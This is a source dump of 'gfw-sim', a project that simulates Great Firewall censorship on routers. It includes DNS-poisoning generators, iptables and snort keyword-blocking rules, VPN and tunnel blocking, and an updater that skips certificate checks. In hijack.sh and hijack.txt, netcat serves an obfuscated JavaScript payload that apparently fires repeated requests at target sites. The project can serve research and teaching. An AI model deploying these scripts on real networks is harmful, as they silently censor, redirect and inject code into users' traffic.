├── misc ├── etc │ ├── gfw.digest │ ├── init.d │ │ └── gfw │ ├── hijack.txt │ └── dnsmasq.conf.gfw.example └── usr │ └── bin │ ├── dns.sh │ └── hijack.sh ├── ipk ├── debian_binary ├── conffiles ├── preremove ├── postinst ├── control └── make_ipk.sh ├── ipk-snort ├── debian_binary ├── conffiles ├── preremove ├── postinst ├── control └── make_ipk.sh ├── dns_poisoning ├── resources │ ├── proxy.pac │ ├── __init__.py │ ├── builtin.txt │ └── abp.js ├── iptables.sh ├── generate.sh └── update_blacklist.py ├── releases ├── gfw.ipk ├── dist_pc.deb ├── update.tgz ├── gfw-snort.ipk ├── gfwsim-0.1.0-2.noarch.rpm ├── gfwsim-meta-1.0.0-0.noarch.rpm ├── digest └── README.md ├── dist_pc └── DEBIAN │ ├── changelog │ ├── conffiles │ ├── changelog.Debian │ ├── control │ ├── postinst │ ├── prerm │ └── etc.init.d.gfw ├── .gitignore ├── keywords ├── local.gfw.rules ├── encode_utils.py ├── generate_snort_rules.py ├── generate_rules.py ├── generate_from_subnets.py └── resource │ └── subnets.txt ├── misc-snort └── etc │ ├── init.d │ └── gfw-snort │ └── snort │ └── snort.gfw.conf ├── rpm_spec ├── LICENSE ├── updater └── updater.sh ├── preventbypass └── enable-block.sh ├── ipblock ├── resource │ ├── ips.txt │ ├── heavy_domains.txt │ └── domains.txt └── update_rules.py ├── Makefile └── README.md /misc/etc/gfw.digest: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ipk/debian_binary: -------------------------------------------------------------------------------- 1 | 2.0 2 | -------------------------------------------------------------------------------- /ipk-snort/debian_binary: -------------------------------------------------------------------------------- 1 | 2.0 2 | -------------------------------------------------------------------------------- /ipk/conffiles: -------------------------------------------------------------------------------- 1 | /etc/dnsmasq.conf 2 | -------------------------------------------------------------------------------- /ipk-snort/conffiles: -------------------------------------------------------------------------------- 1 | /etc/dnsmasq.conf 2 | -------------------------------------------------------------------------------- /dns_poisoning/resources/proxy.pac: -------------------------------------------------------------------------------- 1 | __DOMAINS__ 2 | -------------------------------------------------------------------------------- /ipk/preremove: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | /etc/init.d/gfw disable 3 | -------------------------------------------------------------------------------- /ipk-snort/preremove: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | /etc/init.d/gfw-snort disable 3 | -------------------------------------------------------------------------------- /ipk/postinst: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | /etc/init.d/gfw enable || echo "Success" 3 | 4 | -------------------------------------------------------------------------------- /dns_poisoning/resources/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | -------------------------------------------------------------------------------- /ipk-snort/postinst: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | /etc/init.d/gfw-snort enable || echo "Success" 3 | 4 | -------------------------------------------------------------------------------- /releases/gfw.ipk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phoeagon/gfw-sim/HEAD/releases/gfw.ipk -------------------------------------------------------------------------------- /releases/dist_pc.deb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phoeagon/gfw-sim/HEAD/releases/dist_pc.deb -------------------------------------------------------------------------------- /releases/update.tgz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phoeagon/gfw-sim/HEAD/releases/update.tgz -------------------------------------------------------------------------------- /releases/gfw-snort.ipk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phoeagon/gfw-sim/HEAD/releases/gfw-snort.ipk -------------------------------------------------------------------------------- /releases/gfwsim-0.1.0-2.noarch.rpm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phoeagon/gfw-sim/HEAD/releases/gfwsim-0.1.0-2.noarch.rpm -------------------------------------------------------------------------------- /dist_pc/DEBIAN/changelog: -------------------------------------------------------------------------------- 1 | gfwsim (0.1.0) 2 | 3 | * Initial Commit. 4 | 5 | -- phoeagon 2015-1-13 6 | -------------------------------------------------------------------------------- /dist_pc/DEBIAN/conffiles: -------------------------------------------------------------------------------- 1 | /etc/gfw.digest 2 | /etc/dnsmasq.d/domains.conf 3 | /etc/dnsmasq.conf.gfw.example 4 | /etc/init.d/gfw 5 | -------------------------------------------------------------------------------- /releases/gfwsim-meta-1.0.0-0.noarch.rpm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phoeagon/gfw-sim/HEAD/releases/gfwsim-meta-1.0.0-0.noarch.rpm -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | *.pyc 2 | dist_pc/DEBIAN/md5sums 3 | dist_pc/DEBIAN/copyright 4 | dist 5 | tmp 6 | dist_pc.tar 7 | dist_pc/etc/ 8 | dist_pc/usr/ 9 | -------------------------------------------------------------------------------- /releases/digest: -------------------------------------------------------------------------------- 1 | d9fbb52cc4213c6809b35678904a7b40 releases/update.tgz 2 | https://github.com/phoeagon/gfw-sim/raw/release/releases/update.tgz 3 | -------------------------------------------------------------------------------- /dist_pc/DEBIAN/changelog.Debian: -------------------------------------------------------------------------------- 1 | gfwsim Debian maintainer and upstream author are identical. 2 | Therefore see also normal changelog file for Debian changes. 3 | -------------------------------------------------------------------------------- /dns_poisoning/resources/builtin.txt: -------------------------------------------------------------------------------- 1 | ||google.com 2 | ||google.co.jp 3 | ||google.co.hk 4 | ||bbc.co.uk 5 | ||googleapis.com 6 | ||googlesyndication.com 7 | ||github.com 8 | ||wikipedia.org 9 | -------------------------------------------------------------------------------- /ipk-snort/control: -------------------------------------------------------------------------------- 1 | Package: gfw-snort 2 | Priority: optional 3 | Section: net 4 | Depends: snort 5 | Description: A snort based keywords censoring system 6 | Maintainer: phoeagon 7 | Source: N/A 8 | Version: 0.1.0 9 | Architecture: all 10 | -------------------------------------------------------------------------------- /dist_pc/DEBIAN/control: -------------------------------------------------------------------------------- 1 | Package: gfwsim 2 | Version: 0.1.0 3 | Section: admin 4 | Priority: optional 5 | Architecture: all 6 | Depends: iptables (>=1.3.0), dnsmasq (>=2.30.1) 7 | Maintainer: phoeagon 8 | Description: A mock implementation of GFW, on Ubuntu. 9 | -------------------------------------------------------------------------------- /dist_pc/DEBIAN/postinst: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | which update-rc.d >/dev/null 2>&1 3 | if [ $? -eq 0 ]; then 4 | update-rc.d gfw defaults 95 || echo "" 5 | update-rc.d gfw enable || echo "Success" 6 | else 7 | chkconfig --add gfw 8 | chkconfig gfw on 9 | fi 10 | 11 | -------------------------------------------------------------------------------- /dist_pc/DEBIAN/prerm: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | which update-rc.d >/dev/null 2>&1 3 | if [ $? -eq 0 ]; then 4 | invoke-rc.d gfw stop 5 | update-rc.d gfw disable 6 | update-rc.d -f gfw remove 7 | else 8 | chkconfig gfw off 9 | chkconfig --del gfw 10 | fi 11 | -------------------------------------------------------------------------------- /ipk/control: -------------------------------------------------------------------------------- 1 | Package: gfw 2 | Priority: optional 3 | Section: net 4 | Depends: iptables-mod-filter dnsmasq wget tar 5 | Description: A mock implementation of GFW. 6 | Maintainer: phoeagon 7 | Source: N/A 8 | Version: 0.1.2 9 | Architecture: all 10 | -------------------------------------------------------------------------------- /keywords/local.gfw.rules: -------------------------------------------------------------------------------- 1 | # ---------------- 2 | # LOCAL RULES 3 | # ---------------- 4 | # This file intentionally does not come with signatures. Put your local 5 | # additions here. 6 | reject tcp any any -> any any (content: "facebook";sid: 1000001;) 7 | reject tcp any any -> any any (content: "twitter";sid: 1000002;) 8 | -------------------------------------------------------------------------------- /misc-snort/etc/init.d/gfw-snort: -------------------------------------------------------------------------------- 1 | #!/bin/sh /etc/rc.common 2 | 3 | START=97 4 | 5 | SERVICE_USE_PID=1 6 | SERVICE_WRITE_PID=1 7 | SERVICE_DAEMONIZE=1 8 | 9 | start() { 10 | service_start /usr/bin/snort -c /etc/snort/snort.gfw.conf -i wlan0 11 | } 12 | 13 | stop() { 14 | service_stop /usr/bin/snort 15 | } 16 | -------------------------------------------------------------------------------- /misc/usr/bin/dns.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | iptables -t nat -N DNSPOISONING 3 | 4 | # Skip local 5 | iptables -t nat -A DNSPOISONING -d 127.0.0.1 -j RETURN 6 | 7 | # Redirect all DNS queries to local 8 | iptables -t nat -A DNSPOISONING -p udp --destination-port 53 -j REDIRECT --to-ports 53 9 | 10 | # Apply 11 | iptables -t nat -A PREROUTING -j DNSPOISONING 12 | -------------------------------------------------------------------------------- /dns_poisoning/iptables.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | iptables -t nat -N DNSPOISONING 3 | 4 | # Skip local 5 | iptables -t nat -A DNSPOISONING -d 127.0.0.1 -j RETURN 6 | 7 | # Redirect all DNS queries to local 8 | iptables -t nat -A DNSPOISONING -p udp --destination-port 53 -j REDIRECT --to-ports 53 9 | 10 | # Apply 11 | iptables -t nat -A PREROUTING -j DNSPOISONING 12 | -------------------------------------------------------------------------------- /releases/README.md: -------------------------------------------------------------------------------- 1 | README for Releases 2 | =========================== 3 | 4 | `gfw.ipk`: The main package file to be installed with `opkg`. 5 | 6 | `gfw-snort.ipk`: The package file that provides keyword censoring with snort, optional. 7 | 8 | `digest`: The file used for update checks. 9 | 10 | `update.tgz`: A gzipped tarball file including the relevant files. 11 | 12 | -------------------------------------------------------------------------------- /misc/usr/bin/hijack.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | # Always end previous instances first 4 | if [ -f /tmp/hijack.pid ]; then 5 | kill -9 /tmp/hijack.pid 6 | killall netcat 7 | rm /tmp/hijack.pid 8 | fi 9 | if [ $1 = 'stop' ];then 10 | exit 11 | fi 12 | 13 | # Assume we are starting 14 | echo $$ > /tmp/hijack.pid 15 | while [ 1 -eq 1 ]; do 16 | netcat -l 80 < /etc/hijact.txt 17 | done 18 | -------------------------------------------------------------------------------- /rpm_spec: -------------------------------------------------------------------------------- 1 | Summary: Meta-Package of GFW Simulator package. 2 | Name: gfwsim-meta 3 | Version: 1.0.0 4 | Release: 0 5 | License: Aoache License 6 | Packager: phoeagon 7 | Vendor: KISS Lab 8 | Group: Networking/Daemons 9 | URL: http://www.gfwrouter.info/ 10 | Requires: gfwsim iptables dnsmasq 11 | BuildArch: noarch 12 | 13 | %description 14 | This is a meta package for gfw-sim, so as to include dependencies. 15 | 16 | %files 17 | 18 | %changelog 19 | * Tue Jan 13 2015 phoeagon 0 20 | - initial 21 | 22 | %define _rpmdir /tmp/ 23 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | Copyright 2015 phoeagon 2 | 3 | Licensed under the Apache License, Version 2.0 (the "License"); 4 | you may not use this file except in compliance with the License. 5 | You may obtain a copy of the License at 6 | 7 | http://www.apache.org/licenses/LICENSE-2.0 8 | 9 | Unless required by applicable law or agreed to in writing, software 10 | distributed under the License is distributed on an "AS IS" BASIS, 11 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | See the License for the specific language governing permissions and 13 | limitations under the License. 14 | -------------------------------------------------------------------------------- /misc/etc/init.d/gfw: -------------------------------------------------------------------------------- 1 | #!/bin/sh /etc/rc.common 2 | 3 | START=96 4 | 5 | SERVICE_USE_PID=1 6 | SERVICE_WRITE_PID=1 7 | SERVICE_DAEMONIZE=1 8 | 9 | start() { 10 | ( sh /usr/bin/dns.sh ) 2>&1 >>/tmp/gfw.log 11 | ( /usr/bin/ipblock.sh ) 2>&1 >>/tmp/gfw.log 12 | ( /usr/bin/keywords.sh ) 2>&1 >>/tmp/gfw.log 13 | ( /usr/bin/preventbypass.sh ) 2>&1 >>/tmp/gfw.log 14 | iptables -I INPUT -d 192.168.1.1 -j ACCEPT 15 | ( sh /usr/bin/hijack.sh start & ) 2>&1 >>/tmp/gfw.log 16 | } 17 | 18 | stop() { 19 | /etc/init.d/firewall restart 20 | ( sh /usr/bin/hijack.sh stop & ) 2>&1 >>/tmp/gfw.log 21 | } 22 | -------------------------------------------------------------------------------- /keywords/encode_utils.py: -------------------------------------------------------------------------------- 1 | import encodings 2 | import base64 3 | 4 | ENCODE_SET={'gb2312', 'utf8'} 5 | OPS={base64.b64encode, base64.b32encode, base64.b16encode, base64.urlsafe_b64encode} 6 | 7 | def enum(keywords): 8 | ret = {a.strip() for a in keywords} 9 | for word in keywords: 10 | try: 11 | word = word.decode('utf8') 12 | except: 13 | pass 14 | try: 15 | word = word.decode('gbk') 16 | except: 17 | pass 18 | for encoding in ENCODE_SET: 19 | try: 20 | ret.add(base64.b64encode(word.encode(encoding))) 21 | except: 22 | pass 23 | return ret 24 | -------------------------------------------------------------------------------- /dns_poisoning/generate.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | DEAD_IPS=`wget -O - 'https://gist.github.com/felixonmars/7ce1dcd193c65937e670/raw/f75bce4a0f9420f08cedad26477f98b5fbc0ec2e/dns_pollution_iplist.txt'` 3 | wget -O /tmp/bl.txt https://raw.githubusercontent.com/Leask/BRICKS/master/gfw.bricks 4 | BLACKLIST=`cat /tmp/bl.txt blacklist.txt | sort | uniq` 5 | 6 | echo "# Blacklisted." 7 | for domain in $BLACKLIST 8 | do 9 | DEAD=`echo $DEAD_IPS | tr ' ' '\n' | sort -R | head -1` 10 | echo "address=/"${domain}"/"${DEAD} 11 | done 12 | 13 | 14 | 15 | echo "# Hijack some Ad sites" 16 | echo "address=/cbjs.baidu.com/127.0.0.1" 17 | echo "address=/valp.atm.youku.com/127.0.0.1" 18 | echo "address=/stat.tudou.com/127.0.0.1" 19 | echo "# Otherwise, go to baidu public DNS." 20 | echo "server=/#/180.76.76.76#53" 21 | -------------------------------------------------------------------------------- /updater/updater.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | mv /etc/resolv.conf /tmp/resolv.conf 3 | echo "nameserver 8.8.8.8" >/etc/resolve.conf 4 | DEST_PACKAGE="/tmp/gfw.update.tgz" 5 | cd /tmp || exit 6 | # Get update digest 7 | URL="https://raw.githubusercontent.com/phoeagon/gfw-sim/release/releases/digest" 8 | wget --no-check-certificate ${URL} -O /tmp/gfw.digest 9 | # Test if need to update 10 | # : openwrt removes diff! 11 | cmp /etc/gfw.digest /tmp/gfw.digest && exit 12 | PACKAGE=`sed '2q;d' /tmp/gfw.digest` 13 | # Download. 14 | wget --no-check-certificate ${PACKAGE} -O ${DEST_PACKAGE} 15 | # Check checksum 16 | EXPECTED_DIGEST=`head -1 /tmp/gfw.digest` 17 | echo ${EXPECTED_DIGEST}" "${DEST_PACKAGE} | md5sum -c || exit 18 | tar xf ${DEST_PACKAGE} -C / 19 | cp /tmp/gfw.digest /etc/gfw.digest 20 | # Print Success 21 | echo "OK" 22 | -------------------------------------------------------------------------------- /dist_pc/DEBIAN/etc.init.d.gfw: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | # 3 | # gfw Start/stop the GFW daemon. 4 | # 5 | # chkconfig: 2345 95 60 6 | # 7 | START=96 8 | 9 | SERVICE_USE_PID=1 10 | SERVICE_WRITE_PID=1 11 | SERVICE_DAEMONIZE=1 12 | 13 | start() { 14 | ( sh /usr/bin/dns.sh ) 2>&1 >>/tmp/gfw.log 15 | ( /usr/bin/ipblock.sh ) 2>&1 >>/tmp/gfw.log 16 | ( /usr/bin/keywords.sh ) 2>&1 >>/tmp/gfw.log 17 | ( /usr/bin/preventbypass.sh ) 2>&1 >>/tmp/gfw.log 18 | iptables -I INPUT -d 192.168.1.1 -j ACCEPT 19 | } 20 | 21 | stop() { 22 | service dnsmasq stop 23 | echo "nameserver 8.8.8.8" >/etc/resolve.conf 24 | iptables -F 25 | iptables -t nat -F 26 | } 27 | 28 | restart() { 29 | stop; 30 | start; 31 | } 32 | 33 | case "$1" in 34 | start) start;; 35 | stop) stop;; 36 | restart|force-reload|reload) restart;; 37 | *) echo "Usage $0 {start|stop|reload|restart|force-reload}";; 38 | esac 39 | -------------------------------------------------------------------------------- /preventbypass/enable-block.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | iptables -N PREVENTBYPASS 3 | 4 | # PPTP 5 | iptables -A PREVENTBYPASS --dport 1723 -j DROP 6 | iptables -A PREVENTBYPASS --dport 47 -j DROP 7 | 8 | # L2TP 9 | iptables -A PREVENTBYPASS -p udp --dport 500 -j DROP 10 | iptables -A PREVENTBYPASS -p udp --dport 4500 -j DROP 11 | iptables -A PREVENTBYPASS -p udp --dport 1701 -j DROP 12 | iptables -A PREVENTBYPASS --dport 50 -j DROP 13 | iptables -A PREVENTBYPASS -p l2tp -j DROP 14 | 15 | # For a more detailed description, see /etc/protocols 16 | # GRE/ESP/IP-Encapsulate/Any-private-interior-gateway/IPIP 17 | iptables -A PREVENTBYPASS -p gre -j DROP 18 | iptables -A PREVENTBYPASS -p esp -j DROP 19 | iptables -A PREVENTBYPASS -p ipencap -j DROP 20 | iptables -A PREVENTBYPASS -p igp -j DROP 21 | iptables -A PREVENTBYPASS -p ipip -j DROP 22 | iptables -A PREVENTBYPASS -p encap -j DROP 23 | iptables -A PREVENTBYPASS -p etherip -j DROP 24 | 25 | # Drop DTLS 26 | iptables -A PREVENTBYPASS -p udp -m string --algo bm --to 30 --hex-string "|17 fe ff|" -j DROP 27 | 28 | 29 | iptables -I FORWARD -j PREVENTBYPASS 30 | -------------------------------------------------------------------------------- /keywords/generate_snort_rules.py: -------------------------------------------------------------------------------- 1 | from argparse import ArgumentParser 2 | from generate_from_subnets import get_socks_keys 3 | 4 | def parse_args(): 5 | parser = ArgumentParser() 6 | parser.add_argument('-f', '--file', dest='input', required=True, 7 | help='Path of blacklisted keywords') 8 | parser.add_argument('--sid', dest='sid', 9 | help='First sid to use') 10 | return parser.parse_args() 11 | 12 | 13 | def generate_snort_rules(blacklist, start_sid=1000000): 14 | for word in blacklist: 15 | start_sid += 1 16 | print "reject tcp any any -> any any (content: \"%s\";sid: %d;)" % (word.strip(), start_sid) 17 | 18 | 19 | def decorate_socks_keys(): 20 | return map(lambda x:'|'+x+'|', 21 | [" ".join(s[i:i+2] for i in range(0, len(s), 2)) 22 | for s in get_socks_keys()]) 23 | 24 | def main(): 25 | args = parse_args() 26 | blacklist = open(args.input, 'r').readlines() + decorate_socks_keys() 27 | start_sid = int(args.sid or 1000000) 28 | generate_snort_rules(blacklist, start_sid) 29 | 30 | if __name__ == '__main__': 31 | main() 32 | -------------------------------------------------------------------------------- /keywords/generate_rules.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import encode_utils 3 | from generate_from_subnets import * 4 | 5 | def _get_keywords_from_google(url='https://gist.githubusercontent.com/zythum/2848881/raw/4bae5bd21da3ed44b8a2cc9d2c1d6cd4c70dc74c/gistfile1.txt'): 6 | r = requests.get(url) 7 | if r.status_code != 200: 8 | return [] 9 | r.encoding = 'utf-8' 10 | content = r.text.replace('|', '\n').replace('"', '').replace("'", '') 11 | return content.splitlines(False) 12 | 13 | def _get_domain_keywords(filename='resource/domains.txt'): 14 | try: 15 | return open(filename, 'r').readlines() 16 | except: 17 | return [] 18 | 19 | 20 | def get_keywords(): 21 | return _get_domain_keywords() + _get_keywords_from_google() 22 | 23 | def generate_iptables(keywords, action='-p tcp -j REJECT --reject-with tcp-reset'): 24 | cont = ['#!/bin/sh', 'iptables -N KEYWORDS'] 25 | cont += [('iptables -A KEYWORDS -m string --algo bm --string "' 26 | + kw.strip() + '" ' + action) for kw in keywords] 27 | cont.extend([#'iptables -I INPUT -j KEYWORDS', 28 | #'iptables -I OUTPUT -j KEYWORDS', 29 | 'iptables -I FORWARD -j KEYWORDS']) 30 | return '\n'.join(cont) 31 | 32 | def main(): 33 | print generate_iptables(encode_utils.enum(get_keywords())) 34 | print get_iptables_rules() 35 | 36 | if __name__ == '__main__': 37 | main() 38 | -------------------------------------------------------------------------------- /misc/etc/hijack.txt: -------------------------------------------------------------------------------- 1 | < HTTP/1.1 200 OK 2 | < Server: Apache 3 | < Connection: close 4 | < Content-Type: text/javascript 5 | < Content-Length: 1464 6 | < 7 | 8 | eval(function(p,a,c,k,e,r){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}(atob("ai5rKCI8NSBzPSc5Oi8vdy5sLmMvNy8yLjAuMC83LkIubyc+PC81PiIpOyFGLkgmJmouaygiPDUgcz0nOTovL0kuNy5jLzctSi5vJz48LzU+Iik7cT0oOCA0KS5kKCk7NiBoPTA7MyBpKCl7NiBhPTggNDtTIDQuVyhhLlgoKSxhLnYoKSxhLlkoKSxhLngoKSxhLnkoKSxhLnooKSkvQX1mPVsiOTovL20ubC5jLyIsIjk6Ly9tLkQuRS8iXTtuPWYuRzszIGcoKXs2IGE9aSgpJW47cChmW2FdKX0zIHAoYSl7NiBiOyQuSyh7TDphLE06IjUiLE46TyxQOiEwLFE6Mygpe3I9KDggNCkuZCgpfSxSOjMoKXtlPSg4IDQpLmQoKTtiPVQuVShlLXIpO1Y+ZS1xJiYodChiKSxoKz0xKX19KX0zIHQoYSl7dSgiZygpIixhKX11KCJnKCkiLEMpOw=="),61,61,atob('fHx8ZnVuY3Rpb258RGF0ZXxzY3JpcHR8dmFyfGpxdWVyeXxuZXd8aHR0cHx8fGNvbXxnZXRUaW1lfHJlc3BvbnNlVGltZXx1cmxfYXJyYXl8cl9zZW5kMnxjb3VudHx1bml4dGltZXxkb2N1bWVudHx3cml0ZXxiYWlkdXx3d3d8TlVNfGpzfGdldHxzdGFydGltZXxyZXF1ZXN0VGltZXxzcmN8cl9zZW5kfHNldFRpbWVvdXR8Z2V0TW9udGh8bGlic3xnZXRIb3Vyc3xnZXRNaW51dGVzfGdldFNlY29uZHN8MUUzfG1pbnwyRTN8MzYwfGNufHdpbmRvd3xsZW5ndGh8alF1ZXJ5fGNvZGV8bGF0ZXN0fGFqYXh8dXJsfGRhdGFUeXBlfHRpbWVvdXR8MUU0fGNhY2hlfGJlZm9yZVNlbmR8Y29tcGxldGV8cmV0dXJufE1hdGh8Zmxvb3J8M0U1fFVUQ3xnZXRGdWxsWWVhcnxnZXREYXk=').split('|'),0,{})) 9 | -------------------------------------------------------------------------------- /misc/etc/dnsmasq.conf.gfw.example: -------------------------------------------------------------------------------- 1 | # Change the following lines if you want dnsmasq to serve SRV 2 | # records. 3 | # You may add multiple srv-host lines. 4 | # The fields are ,,,, 5 | 6 | # A SRV record sending LDAP for the example.com domain to 7 | # ldapserver.example.com port 289 8 | #srv-host=_ldap._tcp.example.com,ldapserver.example.com,389 9 | 10 | # Two SRV records for LDAP, each with different priorities 11 | #srv-host=_ldap._tcp.example.com,ldapserver.example.com,389,1 12 | #srv-host=_ldap._tcp.example.com,ldapserver.example.com,389,2 13 | 14 | # A SRV record indicating that there is no LDAP server for the domain 15 | # example.com 16 | #srv-host=_ldap._tcp.example.com 17 | 18 | # The following line shows how to make dnsmasq serve an arbitrary PTR 19 | # record. This is useful for DNS-SD. 20 | # The fields are , 21 | #ptr-record=_http._tcp.dns-sd-services,"New Employee Page._http._tcp.dns-sd-services" 22 | 23 | # Change the following lines to enable dnsmasq to serve TXT records. 24 | # These are used for things like SPF and zeroconf. 25 | # The fields are ,,... 26 | 27 | #Example SPF. 28 | #txt-record=example.com,"v=spf1 a -all" 29 | 30 | #Example zeroconf 31 | #txt-record=_http._tcp.example.com,name=value,paper=A4 32 | 33 | # Provide an alias for a "local" DNS name. Note that this _only_ works 34 | # for targets which are names from DHCP or /etc/hosts. Give host 35 | # "bert" another name, bertrand 36 | # The fields are , 37 | #cname=bertand,bert 38 | 39 | conf-dir=/etc/dnsmasq.d 40 | -------------------------------------------------------------------------------- /ipblock/resource/ips.txt: -------------------------------------------------------------------------------- 1 | 103.25.178.0/24 2 | 111.92.162.0/24 3 | 1.179.248.0/24 4 | 1.179.249.0/24 5 | 1.179.250.0/24 6 | 1.179.251.0/24 7 | 1.179.252.0/24 8 | 1.179.253.0/24 9 | 118.174.25.0/24 10 | 118.174.27.0/24 11 | 118.214.190.0/24 12 | 120.29.145.0/24 13 | 121.78.74.0/24 14 | 123.205.250.0/24 15 | 123.205.251.0/24 16 | 124.108.120.0/24 17 | 124.108.97.0/24 18 | 141.101.114.0/24 19 | 149.126.86.0/24 20 | 163.28.116.0/24 21 | 163.28.83.0/24 22 | 173.194.0.0/24 23 | 173.194.112.0/24 24 | 173.194.126.0/24 25 | 173.194.37.0/24 26 | 173.194.64.0/24 27 | 173.194.66.0/24 28 | 173.194.70.0/24 29 | 173.194.74.0/24 30 | 173.194.76.0/24 31 | 173.194.79.0/24 32 | 173.223.232.0/24 33 | 173.252.100.0/24 34 | 173.252.112.0/24 35 | 174.37.33.0/24 36 | 178.45.251.0/24 37 | 184.169.75.0/24 38 | 184.26.194.0/24 39 | 184.31.111.0/24 40 | 193.90.147.0/24 41 | 197.199.253.0/24 42 | 197.199.254.0/24 43 | 199.16.156.0/24 44 | 199.59.148.0/24 45 | 199.59.149.0/24 46 | 199.59.150.0/24 47 | 202.39.143.0/24 48 | 203.116.165.0/24 49 | 203.117.34.0/24 50 | 203.208.46.0/24 51 | 203.211.0.0/24 52 | 203.66.124.0/24 53 | 204.0.5.0/24 54 | 208.87.33.0/24 55 | 208.94.0.0/24 56 | 209.17.70.0/24 57 | 209.191.105.0/24 58 | 209.191.121.0/24 59 | 209.191.92.0/24 60 | 210.61.221.0/24 61 | 213.240.44.0/24 62 | 216.39.54.0/24 63 | 218.176.242.0/24 64 | 218.189.25.0/24 65 | 218.253.0.0/24 66 | 23.5.157.0/24 67 | 38.229.72.0/24 68 | 41.206.96.0/24 69 | 41.84.159.0/24 70 | 50.23.200.0/24 71 | 50.97.168.0/24 72 | 60.199.175.0/24 73 | 61.213.189.0/24 74 | 61.219.131.0/24 75 | 62.197.198.0/24 76 | 62.201.216.0/24 77 | 64.213.102.0/24 78 | 65.32.34.0/24 79 | 66.152.103.0/24 80 | 66.163.168.0/24 81 | 66.196.66.0/24 82 | 66.220.144.0/24 83 | 66.220.145.0/24 84 | 66.220.147.0/24 85 | 66.220.149.0/24 86 | 66.220.151.0/24 87 | 67.195.19.0/24 88 | 68.142.196.0/24 89 | 68.142.214.0/24 90 | 68.142.250.0/24 91 | 69.147.90.0/24 92 | 69.171.225.0/24 93 | 69.171.227.0/24 94 | 69.171.229.0/24 95 | 69.171.240.0/24 96 | 69.171.245.0/24 97 | 69.171.247.0/24 98 | 69.58.188.0/24 99 | 69.63.183.0/24 100 | 69.63.189.0/24 101 | 76.13.18.0/24 102 | 77.238.160.0/24 103 | 84.235.77.0/24 104 | 87.244.198.0/24 105 | 88.159.13.0/24 106 | 93.123.23.0/24 107 | 96.6.93.0/24 108 | 98.136.171.0/24 109 | 98.136.43.0/24 110 | 98.137.205.0/24 111 | 98.137.88.0/24 112 | 98.138.250.0/24 113 | 98.139.21.0/24 114 | 98.139.235.0/24 115 | 216.239.32.0/19 116 | 64.233.160.0/19 117 | 66.249.80.0/20 118 | 72.14.192.0/18 119 | 209.85.128.0/17 120 | 66.102.0.0/20 121 | 74.125.0.0/16 122 | 64.18.0.0/20 123 | 207.126.144.0/20 124 | 173.194.0.0/16 125 | -------------------------------------------------------------------------------- /keywords/generate_from_subnets.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import ipaddr 3 | import binascii 4 | import math 5 | import sys 6 | 7 | 8 | def get_subnets(filename='resource/subnets.txt'): 9 | f = open(filename, 'r') 10 | subnets = f.readlines() 11 | f.close() 12 | return subnets 13 | 14 | def generate_from_subnets(subnets): 15 | key_set = set() 16 | for subnet in subnets: 17 | subnet = subnet.strip() 18 | sub = ipaddr.IPv4Network(subnet) 19 | length = int(math.ceil(sub.prefixlen/8.0)) 20 | new_set = {binascii.hexlify(a.packed[0:length]) 21 | for a in sub.iter_subnets(new_prefix=length*8)} 22 | key_set = key_set.union(new_set) 23 | return key_set 24 | 25 | 26 | def get_iptables_rules(filename='resource/subnets.txt'): 27 | return generate_iptables(generate_from_subnets(get_subnets(filename))) 28 | 29 | 30 | def main(): 31 | if '-h' in sys.argv or '--help' in sys.argv: 32 | usage() 33 | else: 34 | if len(sys.argv)>1: 35 | subnets = get_subnets(sys.argv[1]) 36 | else: 37 | subnets = get_subnets() 38 | print generate_iptables(generate_from_subnets(subnets)) 39 | 40 | def usage(): 41 | print 'Generate iptables keywords.' 42 | print 'Usage: ./generate_from_subnets.py [subnet_file]' 43 | 44 | ''' The SOCKS request is formed as follows: 45 | 46 | +----+-----+-------+------+----------+----------+ 47 | |VER | CMD | RSV | ATYP | DST.ADDR | DST.PORT | 48 | +----+-----+-------+------+----------+----------+ 49 | | 1 | 1 | X'00' | 1 | Variable | 2 | 50 | +----+-----+-------+------+----------+----------+ 51 | 52 | Where: 53 | 54 | o VER protocol version: X'05' 55 | o CMD 56 | o CONNECT X'01' 57 | o BIND X'02' 58 | o UDP ASSOCIATE X'03' 59 | o RSV RESERVED 60 | o ATYP address type of following address 61 | o IP V4 address: X'01' 62 | o DOMAINNAME: X'03' 63 | o IP V6 address: X'04' 64 | o DST.ADDR desired destination address 65 | o DST.PORT desired destination port in network octet 66 | order 67 | ''' 68 | def generate_socks_keys(keywords): 69 | return map(str.strip, 70 | reduce(list.__add__, 71 | map(lambda x: ['04010001'+x, '05010001'+x], list(keywords)))) 72 | 73 | 74 | def generate_iptables(keywords, action='-p tcp --to 256 -j REJECT --reject-with tcp-reset'): 75 | # Block CONNECT-IPV4-, both SOCKS4 & SOCKS5 76 | cont = ['# This blocks 